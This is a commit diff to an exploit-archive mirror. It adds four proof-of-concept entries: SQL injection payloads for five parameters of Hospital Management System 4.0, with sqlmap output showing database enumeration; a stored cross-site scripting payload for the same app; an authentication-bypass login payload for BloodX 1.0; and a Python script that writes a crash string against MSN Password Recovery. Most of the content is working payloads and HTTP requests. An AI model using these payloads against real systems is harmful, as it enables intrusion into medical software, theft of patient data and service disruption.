DB: 2020-01-03

4 changes to exploits/shellcodes MSN Password Recovery 1.30 - Denial of Service (PoC) Hospital Management System 4.0 - 'searchdata' SQL Injection Hospital Management System 4.0 - Persistent Cross-Site Scripting BloodX 1.0 - Authentication Bypass
2020-01-03 05:02:00 +00:00 · 2020-01-03 05:02:00 +00:00 · 3b67743b55
commit 3b67743b55
parent fcc50f8a35
5 changed files with 258 additions and 0 deletions
--- a/exploits/php/webapps/47840.txt
+++ b/exploits/php/webapps/47840.txt
@ -0,0 +1,166 @@
 # Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
 # Google Dork: N/A
 # Date: 2020-01-02
 # Exploit Author: FULLSHADE
 # Vendor Homepage: https://phpgurukul.com/
 # Software Link: https://phpgurukul.com/hospital-management-system-in-php/
 # Version: v4.0
 # Tested on: Windows
 # CVE : N/A
 # The Hospital Management System 4.0 web application is vulnerable to
 # SQL injection in multiple areas, listed below are 5 of the prominent
 # and easy to exploit areas.
 ================================ 1 - SQLi ================================
 POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
 Host: 10.0.0.214
 User-Agent: Mozilla/5.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 22
 Origin: https://10.0.0.214
 DNT: 1
 Connection: close
 Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php
 Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
 Upgrade-Insecure-Requests: 1
 searchdata=&search=
 ?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.
 POST parameter 'searchdata' is vulnerable.
 sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:
 ---
 Parameter: searchdata (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
 ---
 [15:49:58] [INFO] testing MySQL
 [15:49:58] [INFO] confirming MySQL
 [15:49:58] [INFO] the back-end DBMS is MySQL
 web application technology: Apache 2.4.41, PHP 7.4.1
 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
 [15:49:58] [INFO] fetching database names
 available databases [6]:
 [*] hms
 [*] information_schema
 [*] mysql
 [*] performance_schema
 [*] phpmyadmin
 [*] test
 ================================ 2 - SQLi ================================
 GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
 sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
 ---
 Parameter: viewid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp
 [15:54:21] [INFO] fetching database names
 available databases [6]:
 [*] hms
 [*] information_schema
 [*] mysql
 [*] performance_schema
 [*] phpmyadmin
 [*] test
 GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1
 Host: 10.0.0.214
 User-Agent: Mozilla/5.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
 Upgrade-Insecure-Requests: 1
 Cache-Control: max-age=0
 ?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login
 ================================ 3 - SQLi ================================
 Parameter: bs (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=
 ?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient
 ================================ 4 - SQLi ================================
 POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1
 Host: 10.0.0.214
 User-Agent: Mozilla/5.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 111
 Origin: https://10.0.0.214
 DNT: 1
 Connection: close
 Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
 Upgrade-Insecure-Requests: 1
 patname=
 patname parameter is vulnerable to SQLi under the add patient in the doctor login
 ================================ 5 - SQLi ================================
 ---
 Parameter: cpass (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123
 ---
 available databases [6]:
 [*] hms
 [*] information_schema
 [*] mysql
 [*] performance_schema
 [*] phpmyadmin
 [*] test
 POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1
 Host: 10.0.0.214
 User-Agent: Mozilla/5.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 38
 Origin: http://10.0.0.214
 DNT: 1
 Connection: close
 Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php
 Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
 Upgrade-Insecure-Requests: 1
 cpass=123&npass=123&cfpass=123&submit=123
 the ?cpass parameter is vulnerable to blind SQL injection
--- a/exploits/php/webapps/47841.txt
+++ b/exploits/php/webapps/47841.txt
@ -0,0 +1,36 @@
 # Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting
 # Google Dork: N/A
 # Date: 2020-01-02
 # Exploit Author: FULLSHADE
 # Vendor Homepage: https://phpgurukul.com/
 # Software Link: https://phpgurukul.com/hospital-management-system-in-php/
 # Version: v4.0
 # Tested on: Windows
 # CVE : N/A
 ================ 1. - Cross Site Scripting (Persistent) ================
 URL  :  http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
 Method   :  POST
 Parameter:  doctorspecilization
 Attack   : </td><script>alert("XSS");</script><td>
 POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1
 Host: 10.0.0.214
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 97
 Origin: http://10.0.0.214
 DNT: 1
 Connection: close
 Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
 Upgrade-Insecure-Requests: 1
 Cache-Control: max-age=0
 doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
 ?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed
--- a/exploits/php/webapps/47842.txt
+++ b/exploits/php/webapps/47842.txt
@ -0,0 +1,30 @@
 # Exploit Title: BloodX 1.0 - Authentication Bypass
 # Author: riamloo
 # Date: 2019-12-31
 # Vendor Homepage: https://github.com/diveshlunker/BloodX
 # Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
 # Version: 1
 # CVE: N/A
 # Tested on: Win 10
 # Discription:
 # An standalone platform which lets donors, receivers, organizers and sponsers to merge.
 # Vulnerability: Attacker can bypass login page and access to dashboard page
 # vulnerable file : login.php
 # Parameter & Payload: '=''or'
 # Proof of Concept:
 http://localhost//BloodX-master/login.php
 POST /BloodX-master/login.php HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 63
 Referer: http://localhost/BloodX-master/login.php
 Cookie: PHPSESSID=qusaqht0gvh0f97vbf44ep3iu
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
--- a/exploits/windows/dos/47839.py
+++ b/exploits/windows/dos/47839.py
@ -0,0 +1,22 @@
 # Exploit Title: MSN Password Recovery 1.30 - Denial of Service (PoC)
 # Date: 2020-01-02
 # Vendor Homepage: https://www.top-password.com/
 # Software Link: https://www.top-password.com/download/MSNPRSetup.exe
 # Exploit Author: Gokkulraj
 # Tested Version: v1.30
 # Tested on: Windows 7 x64
 # 1.- Download and install MSN Password Recovery
 # 2.- Run python code : MSN Password Recovery.py
 # 3.- Open CRASH.txt and copy content to clipboard
 # 4.- Open MSN Password Recovery and Click 'EnterKey'
 # 5.- Paste the content of CRASH.txt into the Field: 'User Name and
 Registration Code'
 # 6.- click 'OK' you will see a crash.
 #!/usr/bin/env python
 Dos= "\x41" * 9000
 myfile=open('CRASH.txt','w')
 myfile.writelines(Dos)
 myfile.close()
 print("File created")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6626,6 +6626,7 @@ id,file,description,date,author,type,platform,port
 47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 -  'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
 47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -42143,3 +42144,6 @@ id,file,description,date,author,type,platform,port
 47834,exploits/php/webapps/47834.py,"Shopping Portal ProVersion 3.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,
 47835,exploits/hardware/webapps/47835.txt,"IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal",2020-01-01,"Raif Berkay Dincel",webapps,hardware,
 47836,exploits/php/webapps/47836.py,"Hospital Management System 4.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,
 47840,exploits/php/webapps/47840.txt,"Hospital Management System 4.0 - 'searchdata' SQL Injection",2020-01-02,FULLSHADE,webapps,php,
 47841,exploits/php/webapps/47841.txt,"Hospital Management System 4.0 - Persistent Cross-Site Scripting",2020-01-02,FULLSHADE,webapps,php,
 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,